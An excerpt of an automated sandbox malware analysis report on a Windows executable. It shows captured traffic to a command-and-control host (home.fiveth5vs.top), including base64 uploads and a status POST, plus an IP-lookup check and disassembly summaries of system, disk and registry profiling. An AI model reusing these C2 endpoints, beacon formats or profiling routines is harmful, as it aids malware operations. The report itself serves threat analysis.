                            Data Ascii: /56\/l+HTpTPusn8f8AsSfl2p7bHjm3+Ynmf9sMf5\/+vkU+P956o\/8Ayyjkix\/n8fegCnJ\/eT6+V+Zx\/Lp+XepPMQSf6nyZp\/3uf9dx1\/0TGf8APHpTt22RNk0bp+f+Of6YqFZDH5zOkn7z\/n3\/AOfcd\/8A9XatPaeX4\/8AAAbJjy9++R383\/VyS\/uOnP8A9cev6ofL8z+\/\/wBsv9Tx\/n8zT1\/3JPfzP3H
                            Dec 31, 2024 09:45:25.513921976 CET2472OUTData Raw: 32 6e 5c 2f 45 48 55 5c 2f 43 33 78 46 75 50 6a 64 71 50 69 6a 77 64 6f 75 76 6d 30 75 5c 2f 43 56 6e 34 32 30 72 34 55 66 41 54 34 6f 4c 34 62 38 51 2b 4c 5c 2f 44 6c 37 62 65 4d 4e 48 38 50 58 6c 7a 5c 2f 62 46 6a 34 62 6d 74 4c 72 78 50 61 65
                            Data Ascii: 2n\/EHU\/C3xFuPjdqPijwdouvm0u\/CVn420r4UfAT4oL4b8Q+L\/Dl7beMNH8PXlz\/bFj4bmtLrxPaeHr3VNGsNStfGfTbP4Lar4k0S\/wDHPwx+IGq+DfHfwr+GPi3S\/hzqnxFl1jwx8Q\/jN4N1fx34D8Ga9onxC+Fnw51jT\/E17oWh6nb6toDWUms+GfEVpc+FPEun6T4jtLzTbf4b\/iLvhssRgcNLizB055nUnSy+
                            Dec 31, 2024 09:45:25.518619061 CET4944OUTData Raw: 7a 62 68 37 4e 38 42 6d 57 62 59 54 42 59 4b 68 53 70 34 79 47 48 70 52 65 44 7a 37 41 38 51 35 64 43 4f 46 7a 43 6c 56 77 4f 5a 55 63 5a 67 38 5a 68 34 54 71 59 62 44 34 6e 44 5c 2f 41 4e 65 5c 2f 52 34 34 75 2b 6d 4e 39 44 6a 4f 2b 4f 63 37 34
                            Data Ascii: zbh7N8BmWbYTBYKhSp4yGHpReDz7A8Q5dCOFzClVwOZUcZg8Zh4TqYbD4nD\/ANe\/R44u+mN9DjO+Oc74A8PcuxWA4w4PrZNx7wtxzwrw5x7wln2QZJjK3E9LF4jKcViK06OacLY\/hrF5lhs3yTFYPOMmeFzDBVsRDB5hj8DjP0d\/4fR\/8FAv+hC\/Y6\/8Jb41\/wDz06P+H0f\/AAUC\/wChC\/Y6\/wDCW+Nf\/wA9Ov
                            Dec 31, 2024 09:45:25.518650055 CET4944OUTData Raw: 38 41 4d 32 63 76 39 6e 5c 2f 76 5c 2f 68 2b 4e 56 64 32 33 2b 50 35 78 78 31 5c 2f 38 6d 76 38 41 50 72 2b 46 61 46 6a 79 7a 38 70 5c 2f 33 36 6b 6b 5c 2f 77 41 5c 2f 35 5c 2f 57 6f 66 6e 38 76 65 66 6b 5c 2f 4c 72 5c 2f 30 36 66 79 70 5c 2f 77
                            Data Ascii: 8AM2cv9n\/v\/h+NVd23+P5xx1\/8mv8APr+FaFjyz8p\/36kk\/wA\/5\/Wofn8vefk\/Lr\/06fyp\/wDrAPk\/df8ALLv\/AJ4P55qFc\/cP+kp\/11\/fw\/hz\/Kuc6+d+X9fMZN935I\/n\/wBVL\/02\/wA9enp+MLKnmOU+eP8A1Xmf8t\/89f0q+38D\/vH8uX91z3\/Xr+VVm2R42fc\/z\/n68e9BqUxv8v7\/AG
                            Dec 31, 2024 09:45:25.518763065 CET4944OUTData Raw: 45 79 32 50 69 54 34 69 5c 2f 44 76 34 45 66 48 6e 55 50 48 76 37 4e 37 65 4d 64 53 31 7a 34 34 65 46 58 31 69 39 31 6e 78 39 71 56 6c 70 75 6c 5c 2f 42 66 34 6b 32 73 38 63 6d 71 66 45 62 56 38 6e 34 54 36 54 38 49 5c 2f 77 42 6e 48 78 56 38 51
                            Data Ascii: Ey2PiT4i\/Dv4EfHnUPHv7N7eMdS1z44eFX1i91nx9qVlpul\/Bf4k2s8cmqfEbV8n4T6T8I\/wBnHxV8Q\/E3xS+LOgfG268b6J4Y\/aki+Jfwy8M\/G\/XdK8a\/twfAv4qS\/Fn4NaZ4otPHnwq+Cvj+B\/HGr3vjPwn4l8Q3nhq18J6bafEYarql\/cR2d2+l\/SU+g6BdFWudC0e4ZQQrT6bZSlQTkhTJAxAJ5IHGalTQt
                            Dec 31, 2024 09:45:25.563225985 CET34608OUTData Raw: 2f 41 4a 63 34 71 46 4b 74 48 33 6f 49 2b 4b 66 6a 52 71 6b 58 78 64 38 49 33 50 77 6c 2b 45 50 77 2b 2b 46 66 67 33 77 5c 2f 65 66 73 55 66 73 53 5c 2f 73 36 5c 2f 48 72 39 6f 5c 2f 52 64 4a 2b 4d 38 50 78 36 38 64 61 56 38 43 66 68 74 38 4a 30
                            Data Ascii: /AJc4qFKtH3oI+KfjRqkXxd8I3Pwl+EPw++Ffg3w\/efsUfsS\/s6\/Hr9o\/RdJ+M8Px68daV8Cfht8J08afBO6T4hfEdfhxo3gnQvib4I0h7y\/+Enwu8Cal49HgLw0mp+P\/ABH4el1B9X634pePPhR4Xt\/DWqfEX4v\/AA5\/aV\/aLtvB37dngSf9qH4RfCD4yaF4m1r4W+Ov+Ce\/xY+Bnwk8JftQeI\/G3wh+GXiv40
                            Dec 31, 2024 09:45:29.171086073 CET138INHTTP/1.1 200 OK
                            server: nginx/1.22.1
                            date: Tue, 31 Dec 2024 08:45:29 GMT
                            content-type: text/html; charset=utf-8
                            content-length: 1
                            Data Raw: 30
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.949707176.53.146.223801136C:\Users\user\Desktop\ivHDHq51Ar.exe
                            TimestampBytes transferredDirectionData
                            Dec 31, 2024 09:45:29.859013081 CET98OUTGET /KhxTILlSHLygUudVWlQk1735537737?argument=0 HTTP/1.1
                            Host: home.fiveth5vs.top
                            Accept: */*
                            Dec 31, 2024 09:45:30.688366890 CET353INHTTP/1.1 404 NOT FOUND
                            server: nginx/1.22.1
                            date: Tue, 31 Dec 2024 08:45:30 GMT
                            content-type: text/html; charset=utf-8
                            content-length: 207
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                            Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.949708176.53.146.223801136C:\Users\user\Desktop\ivHDHq51Ar.exe
                            TimestampBytes transferredDirectionData
                            Dec 31, 2024 09:45:31.507883072 CET171OUTPOST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1
                            Host: home.fiveth5vs.top
                            Accept: */*
                            Content-Type: application/json
                            Content-Length: 31
                            Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                            Data Ascii: { "id1": "0", "data": "Done1" }
                            Dec 31, 2024 09:45:32.606327057 CET353INHTTP/1.1 404 NOT FOUND
                            server: nginx/1.22.1
                            date: Tue, 31 Dec 2024 08:45:32 GMT
                            content-type: text/html; charset=utf-8
                            content-length: 207
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                            Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.94970534.200.57.1144431136C:\Users\user\Desktop\ivHDHq51Ar.exe
                            TimestampBytes transferredDirectionData
                            2024-12-31 08:45:22 UTC52OUTGET /ip HTTP/1.1
                            Host: httpbin.org
                            Accept: */*
                            2024-12-31 08:45:22 UTC224INHTTP/1.1 200 OK
                            Date: Tue, 31 Dec 2024 08:45:22 GMT
                            Content-Type: application/json
                            Content-Length: 31
                            Connection: close
                            Server: gunicorn/19.9.0
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Credentials: true
                            2024-12-31 08:45:22 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                            Data Ascii: { "origin": "8.46.123.189"}


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            System Behavior

                            General

                            Target ID:0
                            Start time:03:45:17
                            Start date:31/12/2024
                            Path:C:\Users\user\Desktop\ivHDHq51Ar.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\ivHDHq51Ar.exe"
                            Imagebase:0x150000
                            File size:4'514'816 bytes
                            MD5 hash:27B03055C39DAAB2CE7AE0C5A369F0F1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:2.5%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:20.8%
                              Total number of Nodes:221
                              Total number of Limit Nodes:30
                              execution_graph 57168 204720 57172 204728 57168->57172 57169 204733 57171 204774 57172->57169 57177 20476c 57172->57177 57178 209270 57172->57178 57174 204860 57181 204950 57174->57181 57176 204878 57177->57176 57185 2030a0 closesocket 57177->57185 57186 20a440 57178->57186 57180 209297 57180->57174 57183 204966 57181->57183 57182 204aa0 gethostname 57182->57183 57184 2049c5 57182->57184 57183->57182 57183->57184 57184->57177 57185->57171 57214 20a46b 57186->57214 57187 20aa03 RegOpenKeyExA 57188 20ab70 RegOpenKeyExA 57187->57188 57189 20aa27 RegQueryValueExA 57187->57189 57192 20ac34 RegOpenKeyExA 57188->57192 57209 20ab90 57188->57209 57190 20aa71 57189->57190 57191 20aacc RegQueryValueExA 57189->57191 57190->57191 57198 20aa85 RegQueryValueExA 57190->57198 57194 20ab66 RegCloseKey 57191->57194 57195 20ab0e 57191->57195 57193 20acf8 RegOpenKeyExA 57192->57193 57212 20ac54 57192->57212 57196 20ad56 RegEnumKeyExA 57193->57196 57200 20ad14 57193->57200 57194->57188 57195->57194 57199 20ab1e RegQueryValueExA 57195->57199 57197 20ad9b 57196->57197 57196->57200 57201 20ae16 RegOpenKeyExA 57197->57201 57202 20aab3 57198->57202 57203 20ab4c 57199->57203 57200->57180 57204 20ae34 RegQueryValueExA 57201->57204 57205 20addf RegEnumKeyExA 57201->57205 57202->57191 57203->57194 57206 20af43 RegQueryValueExA 57204->57206 57216 20adaa 57204->57216 57205->57200 57205->57201 57207 20b052 RegQueryValueExA 57206->57207 57206->57216 57208 20adc7 RegCloseKey 57207->57208 57207->57216 57208->57205 57209->57192 57210 20afa0 RegQueryValueExA 57210->57216 57211 20a794 GetBestRoute2 57211->57214 57212->57193 57213 20a6c7 GetBestRoute2 57213->57214 57214->57211 57214->57213 57215 20a4db 57214->57215 57215->57187 57215->57200 57216->57206 57216->57207 57216->57208 57216->57210 57217 2070a0 57221 2070ae 57217->57221 57219 2071a7 57220 20717f 57220->57219 57229 219320 closesocket 57220->57229 57221->57219 57221->57220 57224 21a8c0 57221->57224 57228 2071c0 socket ioctlsocket connect getsockname 57221->57228 57225 21a903 recvfrom 57224->57225 57226 21a8e6 57224->57226 57227 21a8ed 57225->57227 57226->57225 57226->57227 57227->57221 57228->57221 57229->57219 57230 21a920 57231 21a944 57230->57231 57232 21a94b 57231->57232 57233 21a977 send 57231->57233 57352 21b180 57355 21b19b 57352->57355 57359 21b2e3 57352->57359 57356 21b2a9 getsockname 57355->57356 57358 21b020 closesocket 57355->57358 57355->57359 57360 21af30 57355->57360 57364 21b060 57355->57364 57369 21b020 57356->57369 57358->57355 57361 21af63 socket 57360->57361 57362 21af4c 57360->57362 57361->57355 57362->57361 57363 21af52 57362->57363 57363->57355 57367 21b080 57364->57367 57365 21b0b0 connect 57366 21b0bf WSAGetLastError 57365->57366 57366->57367 57368 21b0ea 57366->57368 57367->57365 57367->57366 57367->57368 57368->57355 57370 21b052 57369->57370 57371 21b029 57369->57371 57370->57355 57372 21b04b closesocket 57371->57372 57373 21b03e 57371->57373 57372->57370 57373->57355 57374 21a080 57377 219740 57374->57377 57376 21a09b 57378 219780 57377->57378 57382 21975d 57377->57382 57379 219925 RegOpenKeyExA 57378->57379 57378->57382 57380 21995a RegQueryValueExA 57379->57380 57379->57382 57381 219986 RegCloseKey 57380->57381 57381->57382 57382->57376 57234 152f17 57236 152f2c 57234->57236 57235 1531d3 57236->57235 57237 152fb3 RegOpenKeyExA 57236->57237 57238 15315c RegEnumKeyExA 57236->57238 57239 153046 RegOpenKeyExA 57236->57239 57241 15313b RegCloseKey 57236->57241 57237->57236 57238->57236 57239->57236 57240 153089 RegQueryValueExA 57239->57240 57240->57236 57240->57241 57241->57236 57242 1531d7 57245 1531f4 57242->57245 57243 153200 57244 1532dc CloseHandle 57244->57243 57245->57243 57245->57244 57383 15f7b0 57385 15f7c3 57383->57385 57388 15f97a 57383->57388 57385->57388 57389 18cd80 57385->57389 57386 15f942 57387 15f9bb WSACloseEvent 57386->57387 57387->57388 57390 18d0e5 57389->57390 57391 18cd9a 57389->57391 57390->57386 57391->57390 57392 18d016 57391->57392 57395 166fa0 select 57391->57395 57396 18e130 closesocket 57391->57396 57397 16f6c0 WSACloseEvent select closesocket 57392->57397 57395->57391 57396->57391 57397->57390 57246 15255d 57247 4d9f70 57246->57247 57248 15256c GetSystemInfo 57247->57248 57249 152589 57248->57249 57250 1525a0 GlobalMemoryStatusEx 57249->57250 57255 1525ec 57250->57255 57251 152762 57254 1527d6 KiUserCallbackDispatcher 57251->57254 57252 15263c GetDriveTypeA 57253 152655 GetDiskFreeSpaceExA 57252->57253 57252->57255 57253->57255 57256 1527f8 57254->57256 57255->57251 57255->57252 57257 1528d9 FindFirstFileW 57256->57257 57258 152906 FindNextFileW 57257->57258 57259 152928 57257->57259 57258->57258 57258->57259 57260 188b50 57261 188b6b 57260->57261 57278 188bb5 57260->57278 57262 188b8f 57261->57262 57263 188bf3 57261->57263 57261->57278 57299 166e40 select 57262->57299 57280 18a550 57263->57280 57266 188bfc 57268 188c1f connect 57266->57268 57269 188c35 57266->57269 57275 188cb2 57266->57275 57266->57278 57267 188cd9 SleepEx 57273 188d14 57267->57273 57268->57269 57295 18a150 57269->57295 57270 18a150 getsockname 57277 188dff 57270->57277 57274 188d43 57273->57274 57273->57275 57276 18a150 getsockname 57274->57276 57275->57270 57275->57277 57275->57278 57276->57278 57277->57278 57300 1578b0 closesocket 57277->57300 57279 188ba1 57279->57267 57279->57275 57279->57278 57281 18a575 57280->57281 57285 18a597 57281->57285 57302 1575e0 57281->57302 57283 1578b0 closesocket 57284 18a713 57283->57284 57284->57266 57286 18a811 setsockopt 57285->57286 57287 18a69b 57285->57287 57292 18a83b 57285->57292 57286->57292 57287->57283 57287->57284 57289 18af56 57289->57287 57290 18af5d 57289->57290 57290->57284 57291 18a150 getsockname 57290->57291 57291->57284 57292->57287 57294 18abe1 57292->57294 57308 186be0 select closesocket 57292->57308 57294->57287 57307 1b67e0 ioctlsocket 57294->57307 57296 18a15f 57295->57296 57298 18a1d0 57295->57298 57297 18a181 getsockname 57296->57297 57296->57298 57297->57298 57298->57279 57299->57279 57301 1578c5 57300->57301 57301->57278 57303 157607 socket 57302->57303 57304 1575ef 57302->57304 57305 15762b 57303->57305 57304->57303 57306 157643 57304->57306 57305->57285 57306->57285 57307->57289 57308->57294 57398 1895b0 57399 1895c8 57398->57399 57401 1895fd 57398->57401 57400 18a150 getsockname 57399->57400 57399->57401 57400->57401 57402 1529ff FindFirstFileA 57403 152a31 57402->57403 57404 152a5c RegOpenKeyExA 57403->57404 57405 152a93 57404->57405 57406 152ade CharUpperA 57405->57406 57407 152b0a 57406->57407 57408 152bf9 QueryFullProcessImageNameA 57407->57408 57409 152c3b CloseHandle 57408->57409 57411 152c64 57409->57411 57410 152df1 CloseHandle 57412 152e23 57410->57412 57411->57410 57309 153d5e 57311 153d30 57309->57311 57311->57309 57312 153d90 57311->57312 57313 160ab0 57311->57313 57316 1605b0 57313->57316 57315 160acd 57315->57311 57319 1605bd 57316->57319 57322 1607c7 57316->57322 57317 160707 WSAEventSelect 57317->57319 57317->57322 57318 1607ef 57318->57322 57324 160847 57318->57324 57330 166fa0 57318->57330 57319->57317 57319->57318 57319->57322 57326 1576a0 57319->57326 57322->57315 57323 1609e8 WSAEnumNetworkEvents 57323->57324 57325 1609d0 WSAEventSelect 57323->57325 57324->57322 57324->57323 57324->57325 57325->57323 57325->57324 57327 1576e6 send 57326->57327 57328 1576c0 57326->57328 57329 1576c9 57327->57329 57328->57327 57328->57329 57329->57319 57331 166fd4 57330->57331 57333 166feb 57330->57333 57332 167207 select 57331->57332 57331->57333 57332->57333 57333->57324 57413 16d5e0 57414 16d652 WSAStartup 57413->57414 57415 16d5f0 57413->57415 57414->57415 57334 18e400 57335 18e412 57334->57335 57337 18e459 57334->57337 57338 1868b0 closesocket 57335->57338 57338->57337 57339 18b3c0 57340 18b3cb 57339->57340 57341 18b3ee 57339->57341 57343 1576a0 send 57340->57343 57345 189290 57340->57345 57342 18b3ea 57343->57342 57346 1576a0 send 57345->57346 57347 1892e5 57346->57347 57348 189392 57347->57348 57349 189335 WSAIoctl 57347->57349 57348->57342 57349->57348 57350 189366 57349->57350 57350->57348 57351 189371 setsockopt 57350->57351 57351->57348

                              Executed Functions

                              Function 0018F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID:
                              • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                              • API String ID: 0-1590685507
                              • Opcode ID: c582618644bc30ca35e5807de34548787c1bf542abf103c4bdd6b30368e1b46f
                              • Instruction ID: 5e111f44186e3ffa4e5d54fd645d3884b7eb4d60c8efdcc2abaabe39a26846aa
                              • Opcode Fuzzy Hash: c582618644bc30ca35e5807de34548787c1bf542abf103c4bdd6b30368e1b46f
                              • Instruction Fuzzy Hash: 94C2B131A043449FDB14DF29C484B6AB7E1BF88314F19866DEC989B292D771EA85CF81
                              Function 0015255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282fileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • GetSystemInfo.KERNELBASE ref: 00152579
                              • GlobalMemoryStatusEx.KERNELBASE ref: 001525CC
                              • GetDriveTypeA.KERNELBASE ref: 00152647
                              • GetDiskFreeSpaceExA.KERNELBASE ref: 0015267E
                              • KiUserCallbackDispatcher.NTDLL ref: 001527E2
                              • FindFirstFileW.KERNELBASE ref: 001528F8
                              • FindNextFileW.KERNELBASE ref: 0015291F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                              • String ID: @$`$gko
                              • API String ID: 3271271169-3173616720
                              • Opcode ID: b76237ea7cfcf6047d3ec9f8768dfb61ba9b3bbc39019abbaa65bba9a5d14d13
                              • Instruction ID: e13ef9d906d448a6be158c151be3e536bf79490053051c0a5745dc3052c3f9f2
                              • Opcode Fuzzy Hash: b76237ea7cfcf6047d3ec9f8768dfb61ba9b3bbc39019abbaa65bba9a5d14d13
                              • Instruction Fuzzy Hash: F4D1A0B49053199FCB40EF68C98569EBBF1BF48304F00896EE898D7351E7349A94CF96
                              Function 001529FF Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 321registryfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1267 1529ff-152a2f FindFirstFileA 1268 152a31-152a36 1267->1268 1269 152a38 1267->1269 1270 152a3d-152a91 call 606790 call 606820 RegOpenKeyExA 1268->1270 1269->1270 1275 152a93-152a98 1270->1275 1276 152a9a 1270->1276 1277 152a9f-152b0c call 606790 call 606820 CharUpperA call 4d8da0 1275->1277 1276->1277 1285 152b15 1277->1285 1286 152b0e-152b13 1277->1286 1287 152b1a-152b92 call 606790 call 606820 call 4d8e80 call 4d8e70 1285->1287 1286->1287 1296 152b94-152ba3 1287->1296 1297 152bcc-152c66 QueryFullProcessImageNameA CloseHandle call 4d8da0 1287->1297 1300 152ba5-152bae 1296->1300 1301 152bb0-152bca call 4d8e68 1296->1301 1307 152c6f 1297->1307 1308 152c68-152c6d 1297->1308 1300->1297 1301->1296 1301->1297 1309 152c74-152ce9 call 606790 call 606820 call 4d8e80 call 4d8e70 1307->1309 1308->1309 1318 152dcf-152e1c call 606790 call 606820 CloseHandle 1309->1318 1319 152cef-152d49 call 4d8bb0 call 4d8da0 1309->1319 1329 152e23-152e2e 1318->1329 1330 152d99-152dad 1319->1330 1331 152d4b-152d63 call 4d8da0 1319->1331 1332 152e37 1329->1332 1333 152e30-152e35 1329->1333 1330->1318 1331->1330 1339 152d65-152d7d call 4d8da0 1331->1339 1335 152e3c-152ed6 call 606790 call 606820 1332->1335 1333->1335 1348 152ed8-152ee1 1335->1348 1349 152eea 1335->1349 1339->1330 1345 152d7f-152d97 call 4d8da0 1339->1345 1345->1330 1353 152daf-152dc9 call 4d8e68 1345->1353 1348->1349 1351 152ee3-152ee8 1348->1351 1352 152eef-152f16 call 606790 call 606820 1349->1352 1351->1352 1353->1318 1353->1319
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1633483630.0000000000151000.00000040.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1633465505.0000000000150000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000082E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1633483630.0000000000851000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634309297.0000000000854000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.00000000009E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000AF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000B00000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634337958.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1634831658.0000000000BF2000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635095280.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1635119298.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_ivHDHq51Ar.jbxd
                              Similarity
                              • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                              • String ID: 0$Alo
                              • API String ID: 2406880114-760137831
                              • Opcode ID: e0848b366a0e3d377b36fb231abd56286c32c098f95146bccb6b0d98a30192d6
                              • Instruction ID: e48ac3d19fa373b8ebfe8e4c522a4cddbf095473c397372028d7c55466971423
